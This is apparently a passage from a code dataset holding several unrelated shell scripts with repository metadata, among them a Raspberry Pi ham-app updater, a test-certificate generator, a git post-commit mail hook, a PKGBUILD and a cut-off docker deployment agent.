# Use -e to actually test that the path exists.
if [ -e "$arq" ]
then echo "O caminho para $arq está habilitado!"
else
echo "O caminho para $arq não está habilitado."
fi
if [ -w "$arq" ]
then echo "Você tem permissão para editar $arq"
else
echo "Você NÃO foi autorizado a editar $arq"
fi
| true
|
5c7317bbf1d0401e4d564053115c54ee0e1f07bc
|
Shell
|
redis/redis-py
|
/dockers/stunnel/create_certs.sh
|
UTF-8
| 1,102
| 3.34375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Generate a throwaway CA plus server and client certificates for the
# stunnel test setup. Everything is written to <script dir>/keys.
set -e
DESTDIR=`dirname "$0"`/keys
test -d "${DESTDIR}" || mkdir "${DESTDIR}"
cd "${DESTDIR}"
SSL_SUBJECT="/C=CA/ST=Winnipeg/L=Manitoba/O=Some Corp/OU=IT Department/CN=example.com"
# BUG FIX: under `set -e` the original bare `which openssl` aborted the
# script before the `if [ $? -ne 0 ]` check could ever print its message.
# Testing the command directly inside `if` is exempt from -e.
if ! command -v openssl &>/dev/null; then
echo "No openssl binary present, exiting."
exit 1
fi
# CA key + self-signed CA certificate.
openssl genrsa -out ca-key.pem 2048 &>/dev/null
openssl req -new -x509 -nodes -days 365000 \
-key ca-key.pem \
-out ca-cert.pem \
-subj "${SSL_SUBJECT}" &>/dev/null
# Server key/CSR, then sign the CSR with the CA.
openssl req -newkey rsa:2048 -nodes -days 365000 \
-keyout server-key.pem \
-out server-req.pem \
-subj "${SSL_SUBJECT}" &>/dev/null
openssl x509 -req -days 365000 -set_serial 01 \
-in server-req.pem \
-out server-cert.pem \
-CA ca-cert.pem \
-CAkey ca-key.pem &>/dev/null
# Client key/CSR, signed by the same CA.
openssl req -newkey rsa:2048 -nodes -days 365000 \
-keyout client-key.pem \
-out client-req.pem \
-subj "${SSL_SUBJECT}" &>/dev/null
openssl x509 -req -days 365000 -set_serial 01 \
-in client-req.pem \
-out client-cert.pem \
-CA ca-cert.pem \
-CAkey ca-key.pem &>/dev/null
echo "Keys generated in ${DESTDIR}:"
ls
| true
|
2da1d8ee6181cbd5832863c878098f7e79df06ca
|
Shell
|
stormlovetao/rnaSeq
|
/Align2ViralGenS1.sh
|
UTF-8
| 942
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
#########################
#
#This script aims to align all unmapped samples to Viral/Bacterial genomes.
# version: V-0.0.0
# 1. Download Viral/Bacterial genomes from NCBI(ftp://ftp.ncbi.nlm.nih.gov/genomes/Viruses/) to local server
# 2. Use Bowtie/SNAP to build index of reference genomes.
# 3. Use Bowtie/SNAP to map samples to indexes.
#
# This script use SNAP as default aligner. And perform the part 2.
#########################
# Load the SNAP aligner from the cluster's environment-module system.
module use /apps/modulefiles/test
module load snap/1.0.20
viruses_root_dir=/data/neurogen/Tao/fna/Viral/ftp.ncbi.nlm.nih.gov/genomes/Viruses
# One subdirectory per virus; each is expected to hold <name>.fna.
for viruses_dir in $viruses_root_dir/*
do
if test -d $viruses_dir
then
# Virus name = directory basename (strip everything up to the last '/').
viruses_name=${viruses_dir##*/}
if [[ -f $viruses_dir/${viruses_name}".fna" ]]; then
# Submit an LSF job that builds the SNAP index for this genome into
# <dir>/snap_index/, logging to <dir>/snap_index_jobout.
bsub -q "short" -J ${viruses_name}":Indexing" -oo $viruses_dir/snap_index_jobout snap-aligner index $viruses_dir/${viruses_name}".fna" $viruses_dir/snap_index/
fi
fi
done
| true
|
eac126819c1a6d780d861d972c1cc32aee0cbc04
|
Shell
|
AG7GN/hamapps
|
/updatepi.sh
|
UTF-8
| 13,305
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash
# YAD/shell script to install or update certain ham applications, as well as
# update Raspbian OS and apps.
VERSION="1.77.7"
# Open the upstream documentation page for one app in the Pi's web browser.
# Invoked by yad's --dclick-action as `bash -c "Help %s"`, where %s expands
# to the double-clicked row's fields — the app name therefore arrives in $2
# (the second column of the row).
function Help () {
BROWSER="$(command -v chromium-browser)"
declare -A APPS
# Map each installable app to its documentation/home page URL.
APPS[fldigi]="http://www.w1hkj.com/FldigiHelp"
APPS[flmsg]="http://www.w1hkj.com/flmsg-help"
APPS[flamp]="http://www.w1hkj.com/flamp-help"
APPS[flrig]="http://www.w1hkj.com/flrig-help"
APPS[flwrap]="http://www.w1hkj.com/flwrap-help"
APPS[direwolf]="https://github.com/wb2osz/direwolf"
APPS[pat]="https://getpat.io/"
APPS[arim]="https://www.whitemesa.net/arim/arim.html"
APPS[piardop]="https://www.whitemesa.net/arim/arim.html"
APPS[chirp]="https://chirp.danplanet.com/projects/chirp/wiki/Home"
APPS[wsjtx]="https://physics.princeton.edu/pulsar/K1JT/wsjtx.html"
APPS[xastir]="http://xastir.org/index.php/Main_Page"
APPS[nexus-backup-restore.sh]="https://github.com/AG7GN/nexus-backup-restore/blob/master/README.md"
APPS[hamapps]="https://github.com/AG7GN/hamapps/blob/master/README.md"
APPS[nexus-iptables]="https://github.com/AG7GN/nexus-iptables/blob/master/README.md"
APPS[nexus-utilities]="https://github.com/AG7GN/nexus-utilities/blob/master/README.md"
APPS[autohotspot]="https://github.com/AG7GN/autohotspot/blob/master/README.md"
APPS[710.sh]="https://github.com/AG7GN/kenwood/blob/master/README.md"
APPS[pmon]="https://www.p4dragon.com/en/PMON.html"
APPS[nexus-rmsgw]="https://github.com/AG7GN/rmsgw/blob/master/README.md"
APPS[js8call]="http://js8call.com"
APPS[linbpq]="http://www.cantab.net/users/john.wiseman/Documents/InstallingLINBPQ.html"
APP="$2"
# Launch in the background; browser errors (e.g. not installed) are discarded.
$BROWSER ${APPS[$APP]} 2>/dev/null &
}
# Exported so the `bash -c` subshell spawned by yad can see the function.
export -f Help
function GenerateTable () {
# Takes 1 argument: The first word of the middle button ("Select" or "Unselect")
# Shows the app-picker dialog built from the rows previously written to the
# global $TFILE (by GenerateList) and stores yad's comma-separated selection
# in the global ANS. Exit codes: 0=OK, 1=Cancel, 2=middle (select/unselect
# all) button. Double-clicking a row calls Help on that row's fields.
ANS="$(yad --center --title="Update Apps/OS - version $VERSION" --list --borders=10 \
--height=600 --width=900 --text-align=center \
--text "<b>This script will install and/or check for and install updates for the apps you select below.\n \
If there are updates available, it will install them.</b>\n\n \
<b><span color='blue'>For information about or help with an app, double-click the app's name.</span></b>\n \
This will open the Pi's web browser.\n \
This Pi must be connected to the Internet for this script to work.\n\n \
<b><span color='red'>CLOSE ALL OTHER APPS</span></b> <u>before</u> you click OK.\n" \
--separator="," --checklist --grid-lines=hor \
--dclick-action="bash -c \"Help %s\"" \
--auto-kill --column Pick --column Applications --column Description \
--column Action < "$TFILE" --buttons-layout=center --button=Cancel:1 --button="$1 All Installed":2 --button=OK:0)"
}
function GenerateList () {
# Takes 1 argument: 0 = Pick boxes for installed apps are not checked, 1 = Pick boxes for installed apps are checked.
# Writes one 4-field record (Pick/App/Description/Action, newline-separated,
# consumed by yad --list in GenerateTable) per app into a fresh temp file
# whose path is left in the global TFILE. "Action" reflects whether the app
# is already installed (detection method varies per app below).
TFILE="$(mktemp)"
declare -a CHECKED
CHECKED[0]="FALSE"
CHECKED[1]="TRUE"
LIST="710.sh arim autohotspot chirp direwolf flamp fldigi flmsg flrig flwrap hamapps nexus-backup-restore.sh nexus-iptables nexus-rmsgw nexus-utilities js8call linbpq pat piardop pmon wsjtx xastir"
declare -A DESC
DESC[710.sh]="Rig Control Script for Kenwood 710/71A"
DESC[arim]="Amateur Radio Instant Messaging"
DESC[autohotspot]="Wireless HotSpot on your Pi"
DESC[chirp]="Radio Programming Tool"
DESC[direwolf]="Packet Modem/TNC and APRS Encoder/Decoder"
DESC[flamp]="Amateur Multicast Protocol tool for Fldigi"
DESC[fldigi]="Fast Light DIGItal Modem"
DESC[flmsg]="Forms Manager for Fldigi"
DESC[flrig]="Rig Control for Fldigi"
DESC[flwrap]="File Encapsulation for Fldigi"
DESC[hamapps]="Tool for Installing/Updating Apps"
DESC[nexus-backup-restore.sh]="Backup/Restore Home Folder"
DESC[nexus-iptables]="Firewall Rules for Nexus Image"
DESC[nexus-rmsgw]="RMS Gateway software for the Nexus Image"
DESC[nexus-utilities]="Scripts and Apps for Nexus Image"
DESC[js8call]="Weak signal keyboard to keyboard messaging using JS8"
DESC[linbpq]="G8BPQ AX25 Networking Package"
DESC[pat]="Winlink Email Client"
DESC[piardop]="Amateur Radio Digital Open Protocol Modem Versions 1&2"
DESC[pmon]="PACTOR Monitoring Utility"
DESC[wsjtx]="Weak Signal Modes Modem"
DESC[xastir]="APRS Tracking and Mapping Utility"
# First row: the OS update pseudo-entry (struck-through markup is literal yad pango).
echo -e "${CHECKED[$1]}\n<s>Raspbian OS and Apps</s>\n<s>Update Raspbian OS and Apps</s>\n<s>Check for Updates</s>" > "$TFILE"
# echo -e "${CHECKED[$1]}\nRaspbian OS and Apps\nUpdate Raspbian OS and Apps\nCheck for Updates" > "$TFILE"
# Per-app installation detection: each case arm picks the probe appropriate
# to how that app ships (command on PATH, version file, or always-installed).
for A in $LIST
do
case $A in
nexus-iptables|autohotspot)
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
;;
chirp)
if command -v chirpw 1>/dev/null 2>&1
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
nexus-utilities)
if [ -s /usr/local/src/nexus/nexus-utilities.version ]
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
nexus-rmsgw)
if [[ -s /usr/local/src/nexus/nexus-rmsgw.version ]]
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
hamapps)
echo -e "FALSE\n$A\n${DESC[$A]}\nUpdated Automatically" >> "$TFILE"
;;
piardop)
if command -v piardopc 1>/dev/null 2>&1 && command -v piardop2 1>/dev/null 2>&1
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
linbpq)
if [[ -x $HOME/linbpq/linbpq ]]
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
*)
if command -v $A 1>/dev/null 2>&1
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
esac
done
}
function selfUpdate () {
# Self-update: clone the hamapps repo, compare the installed hamapps.sh
# VERSION line against the fresh clone, and install the new scripts when they
# differ.  Exits 0 after an update (user must re-run the tool), exits 1 if
# the clone fails.  Needs network access, $HAMAPPS_GIT_URL, and sudo rights
# to write under /usr/local.
	# Check for and install hamapps.sh updates
	echo "============= Checking for updates to updatepi.sh and hamapps.sh ========"
	cd $HOME
# Remove any stale clone left over from a previous run before cloning again.
	[ -d "$HOME/hamapps" ] && rm -rf hamapps/
	git clone $HAMAPPS_GIT_URL || { echo >&2 "======= git clone $HAMAPPS_GIT_URL failed ========"; exit 1; }
	INSTALLED_VER="$(grep -i "^VERSION" $(which hamapps.sh))"
	LATEST_VER="$(grep -i "^VERSION" hamapps/hamapps.sh)"
	if [[ $INSTALLED_VER == $LATEST_VER ]]
	then
	   echo "============= updatepi.sh and hamapps.sh are up to date ============="
	else
	   sudo cp -f hamapps/updatepi.desktop /usr/local/share/applications/
	   sudo cp -f hamapps/*.sh /usr/local/bin/
# Drop the obsolete per-user desktop entry in favor of the system-wide one.
	   [ -f $HOME/.local/share/applications/updatepi.desktop ] && rm -f $HOME/.local/share/applications/updatepi.desktop
	   echo "============= updatepi.sh and hamapps.sh have been updated =============="
	   echo
	   yad --center --title="Update Apps/OS - version $VERSION" --info --borders=30 \
    --no-wrap --text="A new version of this script has been installed.\n\nPlease \
run <b>Raspberry > Hamradio > Update Pi and Ham Apps</b> again." --buttons-layout=center \
    --button=Close:0
	   exit 0
	fi
	rm -rf hamapps/
}
function newVersion () {
# Open the Nexus DR-X image README in Chromium (backgrounded, stderr discarded).
	BROWSER="$(command -v chromium-browser)"
	$BROWSER https://github.com/AG7GN/images/blob/master/README.md 2>/dev/null &
}
# Exported so "bash -c newVersion" (used as a yad button action) can find it.
export -f newVersion
function deprecated() {
# Show an end-of-life notice; the "More Information" button opens the new
# Nexus DR-X image page via the exported newVersion function.
	yad --center --title="Update Apps/OS - version $VERSION" --info \
	--buttons-layout=center \
	--borders=10 --text-align=center \
	--text="<b><span color='red'>THIS SCRIPT IS DEPRECATED.</span></b>\n
There will be no further updates to it.\nPlease upgrade to the latest Nexus DR-X image." \
	--button="<b><span color='blue'>More Information</span></b>":"bash -c newVersion" \
	--button=Close:0
}
# --- Main script state and preconditions -------------------------------------
# REBOOT is flipped to YES by steps that require a restart; checked at the end.
REBOOT="NO"
APPS=""
OSUPDATES=NO
GITHUB_URL="https://github.com"
HAMAPPS_GIT_URL="$GITHUB_URL/AG7GN/hamapps"
# Check for Internet connectivity
if ! ping -q -w 1 -c 1 github.com > /dev/null 2>&1
then
   yad --center --title="Update Apps/OS - version $VERSION" --info --borders=30 \
--text="<b>No Internet connection found. Check your Internet connection \
and run this script again.</b>" --buttons-layout=center \
--button=Close:0
   exit 1
fi
# Comment the following line out to prevent self-updating of this script.
#selfUpdate
# Show the end-of-life notice before doing anything else.
deprecated
# --- One-time migrations from older Hampi/Nexus images -----------------------
# Move the direwolf scripts to /usr/local/bin if necessary
if ls $HOME/dw-*.sh >/dev/null 2>&1
then
   sudo mv -f $HOME/dw-*.sh /usr/local/bin/
fi
# Check for presence of system LXDE-pi autostart and insert check-piano.sh if not
# already present
AUTOSTART="/etc/xdg/lxsession/LXDE-pi/autostart"
if [ -s $AUTOSTART ]
then
   if ! grep -q check-piano.sh $AUTOSTART 2>/dev/null
   then
# Append the check-piano.sh launcher right after the @pcmanfm entry.
      sudo sed -i '/@pcmanfm .*/a @bash \/usr\/local\/bin\/check-piano.sh' $AUTOSTART
      REBOOT="YES"
   fi
fi
# Change /boot/hampi.txt to nexus.txt
if [ -s /boot/hampi.txt ]
then
   sudo sed -i "s/HAMPI_RELEASE/NEXUS_VERSION/" /boot/hampi.txt
   sudo mv /boot/hampi.txt /boot/nexus.txt
   sudo rm -f /boot/hampi.txt*
fi
# Nexus versions of the following are now installed via nexus-utilities
sudo rm -f /usr/local/bin/hampi-release.sh
sudo rm -f /usr/local/share/applications/hampi-version.desktop
# Use the raspberrypi.org repository
# If sources.list doesn't contain exactly the two expected raspbian.raspberrypi.org
# entries, back it up and replace it wholesale with the canonical buster list.
DIR_="/etc/apt"
FILE_="sources.list"
if (( $(grep -c "^deb.*raspbian.raspberrypi.org" $DIR_/$FILE_) != 2 ))
then
   sudo mv -f $DIR_/$FILE_ $DIR_/${FILE_}.previous
   cat > /tmp/$FILE_ <<EOF
deb http://raspbian.raspberrypi.org/raspbian/ buster main contrib non-free rpi
# Uncomment line below then 'apt-get update' to enable 'apt-get source'
deb-src http://raspbian.raspberrypi.org/raspbian/ buster main contrib non-free rpi
EOF
   sudo mv /tmp/$FILE_ $DIR_/$FILE_
   echo $FILE_ updated
else
   echo "No changes to $FILE_"
fi
# --- App selection dialog loop -----------------------------------------------
# GenerateTable (defined earlier in this file) returns 2 when the user clicks
# the Select/Unselect-all button; any other status ends the loop.
RESULT=2
# Initially generate app list with pick boxes for installed apps not checked
GenerateList 0
PICKBUTTON="Select"
until [ $RESULT -ne 2 ]
do
   GenerateTable $PICKBUTTON
   RESULT="$?"
   if [ $RESULT -eq 2 ]
   then # User clicked "*Select All Installed" button
      case $PICKBUTTON in
         Select)
            # Generate new list with pick box checked for each installed app
            GenerateList 1
            # Change button so user can de-select pick box for all installed apps
            PICKBUTTON="Unselect"
            ;;
         Unselect)
            # Generate new list with pick box unchecked for each installed app
            GenerateList 0
            # Change button so user can check all installed apps.
            PICKBUTTON="Select"
            ;;
      esac
   fi
done
# --- Act on the user's selection ---------------------------------------------
# $ANS (set by GenerateTable via yad) holds one comma-separated record per
# selected row; rows containing "Updates" are upgrades, "New Install" are
# fresh installs.
rm -f "$TFILE"
if [ $RESULT -eq "1" ] || [[ $ANS == "" ]]
then
   echo "Update Cancelled"
   exit 0
else
   if [[ $ANS =~ Raspbian ]]
   then
      OSUPDATES=YES
      ANS="$(echo "$ANS" | grep -v Raspbian)"
   fi
# NOTE(review): this unconditionally reverts the YES set just above, keeping
# OS updates disabled — consistent with the commented-out apt block below,
# but confirm it is intentional before removing.
   OSUPDATES=NO
   #UPDATES="$(echo "$ANS" | grep Updates | cut -d, -f2 | tr '\n' ' ' | sed 's/ $//')"
   #INSTALLS="$(echo "$ANS" | grep "New Install" | cut -d, -f2 | tr '\n' ' ' | sed 's/ $//')"
# Extract the app-name column (field 2) into comma-separated lists.
   UPDATES="$(echo "$ANS" | grep Updates | cut -d, -f2 | tr '\n' ',' | sed 's/,$//')"
   INSTALLS="$(echo "$ANS" | grep "New Install" | cut -d, -f2 | tr '\n' ',' | sed 's/,$//')"
   echo
   # If doing OS updates, also check for Fe-Pi and pulsaudio config file updates
   [[ $OSUPDATES == "YES" ]] && UPDATES+=",fe-pi"
   [[ $UPDATES == ",fe-pi" ]] && UPDATES="fe-pi"
   if [ ! -z "$UPDATES" ]
   then
      echo "Looking for updates to $UPDATES..."
      echo
# hamapps.sh returns 2 when its changes require a reboot.
      $(which hamapps.sh) upgrade $UPDATES
      [ $? -eq 2 ] && REBOOT="YES"
   fi
   echo
   if [[ $INSTALLS != "" ]]
   then
      echo "Installing $INSTALLS..."
      echo
      $(which hamapps.sh) install $INSTALLS
      [ $? -eq 2 ] && REBOOT="YES"
   fi
   echo
#	if [[ $OSUPDATES == "YES" ]]
#	then
##	   yad --center --title="Update Apps/OS - version $VERSION" --info --borders=30 \
##--no-wrap --text-align=center --text="<b>Raspbian OS Updates are temporarily DISABLED due to a kernel bug that affects the Fe-Pi audio board</b>\n\n" \
##--buttons-layout=center \
##--button=Close:0
##		exit 0
#      echo "Checking for regular Raspberry Pi OS updates..."
#      echo
#      sudo apt update
#      sudo apt -m -y upgrade && echo -e "\n\n=========== Raspbian OS Update Finished ==========="
#		# Make sure pulseaudio is not default sound device.  If pulseaudio is updated,
#		# it might restore this file and make pulseaudio the default sound interface.
#		# So, we make sure every nonempty line is commented out.
#		sudo sed -i -e '/^[^#]/ s/^#*/#/' /usr/share/alsa/pulse-alsa.conf
#   fi
fi
if [[ $REBOOT == "YES" ]]
then
   yad --center --title="Update Apps/OS - version $VERSION" --question \
	--borders=30 --no-wrap --text-align=center \
	--text="<b>Reboot Required</b>\n\n" \
	--button="Reboot Now":0 --buttons-layout=center --button=Close:1
   if [ "$?" -eq "1" ]
   then
      echo "" && echo "Skipped reboot" && echo ""
      exit 0
   else
# NOTE(review): 'echo""' runs echo with no argument (prints a blank line by
# accident) — presumably meant 'echo ""'.
      echo "" && echo "Reboot" && echo"" && sudo shutdown -r +0
   fi
fi
yad --center --title="Update Apps/OS - version $VERSION" --info --borders=30 \
    --no-wrap --text-align=center --text="<b>Finished.</b>\n\n" --buttons-layout=center \
    --button=Close:0
exit 0
| true
|
16a007ea0f810335e0666f92b385d117a6e3d3b1
|
Shell
|
petronny/aur3-mirror
|
/uade-git/PKGBUILD
|
UTF-8
| 820
| 3.046875
| 3
|
[] |
no_license
|
# Author: Enverex <ben@xnode.org>
# PKGBUILD metadata for the git build of UADE (Unix Amiga Delitracker Emulator).
pkgname=uade-git
pkgver=20130205
pkgrel=1
pkgdesc="Unix Amiga Delitracker Emulator"
arch=('i686' 'x86_64')
url="http://zakalwe.fi/uade"
license=('GPL')
depends=('libao')
makedepends=('pkgconfig' 'git' 'bencode-tools-git')
# Bug fix: makepkg reads 'conflicts' (plural); the original 'conflict=' was a
# misspelled field and therefore silently ignored.
conflicts=('uade')
provides=('uade')
install=uade.install
_gitroot="git://zakalwe.fi/uade"
_gitname="uade"
build() {
# Fetch (or update) the uade git checkout, then configure and build the
# uadecore and uade123 targets.  $srcdir/$pkgdir are supplied by makepkg.
  cd "${srcdir}"
  msg "Connecting to GIT server...."
  if [ -d ${_gitname} ] ; then
    cd ${_gitname} && git pull origin
    msg "Local files updated."
  else
    git clone ${_gitroot} ${_gitname}
  fi
  msg "GIT checkout done or server timeout"
  msg "Starting make..."
  cd "${srcdir}/${_gitname}"
# --package-prefix presumably bakes $pkgdir into the install root so that the
# plain "make install" in package() stages into it — verify against uade's
# configure script.
  ./configure --prefix="/usr/" --package-prefix="${pkgdir}"
  make uadecore uade123
}
package() {
# Install the built tree; the install destination was set at configure time
# in build() (presumably via --package-prefix — confirm).
  cd "${srcdir}/${_gitname}"
  make install
}
| true
|
86b349ff69de034dbd411badc7247e220b5d0b6e
|
Shell
|
PexMor/tooldock
|
/loopForEver
|
UTF-8
| 226
| 3.265625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Container entrypoint: with no argument (or the literal "param1") it idles
# forever, printing the date every 30 seconds to keep the container alive.
# Any other first argument is executed as /usr/local/bin/<arg> with the
# remaining arguments passed through.
PARAM=$1
echo "Param: $1"
# Bug fix: use two [ ] tests joined by && (the "[ -a ]" form is obsolescent)
# and forward the remaining args as "$@" — the original $* re-split arguments
# containing whitespace.
if [ "x$PARAM" != "x" ] && [ "x$PARAM" != "xparam1" ]; then
	shift
	"/usr/local/bin/$PARAM" "$@"
	exit
fi
echo
echo "Welcome to the docker"
echo
while true; do
	date
	sleep 30
done
| true
|
8af6e2ff28e12b815d0e05b49b359b3146e99089
|
Shell
|
elenst/mariadb-toolbox
|
/git_template/hooks/post-commit
|
UTF-8
| 3,316
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/sh
#
# Copyright (c) 2014 SkySQL Ab
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2 of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
#
# Configuration
# -------------
# hooks.postcommitrecipients (mandatory, error if not set)
# Comma-separated list of email addresses.
# hooks.postcommitbranches (if not configured, no email is sent)
# Space-separated list of branches. * wildcard is allowed
# hooks.postcommitsender (if not configured, user.email will be used if exists,
# otherwise a generated address)
# E-mail address from which the message will be sent.
# hooks.postcommitmailer (default /usr/sbin/sendmail)
# Tool to send the e-mail
#
create_email()
{
# Compose the commit-notification e-mail (headers + commit details) on stdout.
# Reads globals: recipients, branch_nick.
    # Subject will have format <abbreviated revid>: <First line of commit comment>
    subj=$(git log --pretty="%h: %B" | head -1)
    cat <<-EOF
To: $recipients
Subject: $subj
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit
EOF
# Body: commit metadata followed by the full diff/stat and commit message.
    git show --patch-with-stat --format="revision-id: %H%nparent(s): %P%ncommitter: %cN%nbranch nick: $branch_nick%ntimestamp: %ci%nmessage:%n%n%B"
}
send_mail()
{
# Pipe stdin (the composed message) to the configured mailer ($mailer,
# defaulting to sendmail); -f sets the envelope sender when one is configured.
    if [ -n "$sender" ]; then
        ${mailer:-/usr/sbin/sendmail} -t -f "$sender"
    else
        ${mailer:-/usr/sbin/sendmail} -t
    fi
}
#######################
# Main
#######################
# Escape hatch: callers (e.g. scripted history rewrites) may suppress the mail.
if [ -n "$SKIP_COMMIT_EMAIL" ] ; then
    echo "post-commit hook: SKIP_COMMIT_EMAIL set, not sending the commit notification" 1>&2
    exit 0
fi
recipients=$(git config hooks.postcommitrecipients)
branches=$(git config hooks.postcommitbranches)
if [ -z "$branches" ] ; then
    echo "post-commit hook: no branches configured, not sending the commit notification" 1>&2
    exit 0
fi
if [ -z "$recipients" ]; then
    echo "post-commit hook: ERROR: recipient list is empty, not sending the commit notification" 1>&2
    exit 1
fi
branch=$(git branch 2>/dev/null | grep '^*' | sed -e 's/* //')
# We do not want globbing here, because the list of branches might contain
# a wildcard, and we need it to remain the wildcard, not to be expanded
#SHELLOPTS_SAVE=$SHELLOPTS
set -f
# Checking if the current branch matches any value from the configured list
# (the case pattern $b is unquoted on purpose so configured wildcards match).
unset _branch_found
for b in $branches
do
    case $branch in
        $b) _branch_found=1 ; break ;;
        *) ;;
    esac
done
# Restore previous options
# (Commented because SHELLOPTS is read-only in bash)
#SHELLOPTS=$SHELLOPTS_SAVE
if [ -z "$_branch_found" ] ; then
    echo "post-commit hook: branch $branch is not in the configured branch list, not sending the commit notification" 1>&2
    exit 0
fi
sender=$(git config hooks.postcommitsender)
# Fall back to the committer's configured address when no sender is set.
sender=${sender:-$(git config user.email)}
mailer=$(git config hooks.postcommitmailer)
# Branch nick = name of the directory containing the .git dir, with symlinks
# resolved (nested backquotes with escaped inner substitutions).
branch_nick=$(basename `readlink -f \`dirname \\\`git rev-parse --git-dir\\\`\``)
create_email | send_mail
| true
|
a841bf1a831ea1b7cd56c5cf4a236e8da1b18bb6
|
Shell
|
dapeng-soa/cs-agent-client
|
/dist/agent.sh
|
UTF-8
| 9,584
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
# run in Unix
# Determine this host's IPv4 address by probing common interface names in
# order (eth0 -> eno1 -> en0).  $ip is left empty when none of them reports
# an inet address; downstream code interpolates $ip into status strings.
ip=""
for _iface in eth0 eno1 en0; do
	ip=$(ifconfig "$_iface" 2>/dev/null | grep "inet " | awk '{print $2}')
	[ -n "$ip" ] && break
done
getServerInfoResp(){
# Report one service's status as a single line: "ip:name:running:ymlMtime:tag".
# $1 - service/container name, $2 - path to its compose yml file.
if [ $# -lt 2 ];then
    echo "invalid cmd...please input your request [serviceName],[serviceName.yml]"
    exit 1
fi
if [ -e "$2" ];then
# Modification time of the yml: GNU stat first, BSD/macOS flags as fallback.
    time=`stat -c %Y $2 2>/dev/null`
    # macos
    if [ ! $time ];then
        time=`stat -f "%B %N" $2 | awk '{print$1}'`
    fi
else
    time=0
fi
# Tag of the image backing the running container (empty when not running).
result1=`docker ps | grep -w "$1$" | awk '{print $2}' | awk -F ':' '{print $NF}'`
if [[ -z $result1 ]]; then
    result="$ip:$1:false:$time:none"
else
    result="$ip:$1:true:$time:$result1"
fi
echo $result
}
deployResp() {
# (Re)deploy one service with docker-compose.
# $1 - service/compose project name, $2 - compose yml path.
# Echoes compose output plus colored status lines; returns 0 on success.
if [ $# -lt 2 ];then
    echo "invalid cmd...please input your request [serviceName],[serviceName.yml]"
    exit 1
fi
serviceName="$1"
ymlFile="$2"
if [ ! -f "$ymlFile" ]; then
    echo "找不到对应的$ymlFile"
    return 1
else
# Capture compose output (stdout+stderr) so it can be echoed after the check.
    res=$(docker-compose -p $serviceName -f $ymlFile up -d 2>&1)
    if [ $? -ne 0 ]; then
        echo "$res"
        echo -e "\033[31m update $serviceName failed \033[0m"
        echo -e "\033[33m done \033[0m"
        return 1
    else
        echo "$res"
        echo -e "\033[32m update successful!!! \033[0m"
        echo -e "\033[33m done \033[0m"
        return 0
    fi
fi
}
stopResp() {
	# Stop a running Docker container.
	# $1 - container name (any further args are only echoed for logging).
	# Prints colored progress lines; returns docker's success/failure status.
	echo "$@"
	echo -e "\033[33m $ip stopping $1 \033[0m"
	# Quote "$1" so the name can't word-split, and branch on docker's exit
	# status directly instead of the fragile "$?" check.
	if docker stop "$1"; then
		echo -e "\033[32m stop $1 success \033[0m"
		return 0
	else
		echo -e "\033[31m stop $1 fail \033[0m"
		return 1
	fi
}
restartResp() {
	# Restart a Docker container.
	# $1 - container name.  Prints colored progress; returns docker's status.
	echo -e "\033[33m $ip restarting $1 \033[0m"
	# Quote "$1" and branch on docker's exit status directly instead of "$?".
	if docker restart "$1"; then
		echo -e "\033[32m restart $1 success \033[0m"
		return 0
	else
		echo -e "\033[31m restart $1 fail \033[0m"
		return 1
	fi
}
rmContainerResp() {
	# Remove a (stopped) Docker container.
	# $1 - container name (any further args are only echoed for logging).
	echo "$@"
	echo -e "\033[33m $ip rm Container $1 \033[0m"
	# Quote "$1" and branch on docker's exit status directly instead of "$?".
	if docker rm "$1"; then
		echo -e "\033[32m rm Container $1 success \033[0m"
		return 0
	else
		echo -e "\033[31m rm Container $1 fail \033[0m"
		return 1
	fi
}
getYamlFileResp() {
	# Print the contents of the yml file given as $1 to stdout.
	# Quoting (and --) fixes paths containing spaces or a leading dash.
	cat -- "$1"
}
getYamlFile() {
	# Print the contents of the yml file given as $1 to stdout.
	# (Duplicate of getYamlFileResp, kept for the command dispatcher.)
	# Quoting (and --) fixes paths containing spaces or a leading dash.
	cat -- "$1"
}
syncNetworkResp() {
# Create a docker network on this host.
# $1 name, $2 driver, $3 subnet (CIDR), $4 driver option (key=value).
networkName="$1"
driver="$2"
subnet="$3"
opt="$4"
docker network create -d=$driver --subnet=$subnet -o=$opt $networkName
if [ $? -ne 0 ]; then
    echo -e "\033[31m $ip create network $networkName fail \033[0m"
    return 1
else
    echo -e "\033[32m $ip create network $networkName success \033[0m"
    return 0
fi
}
build() {
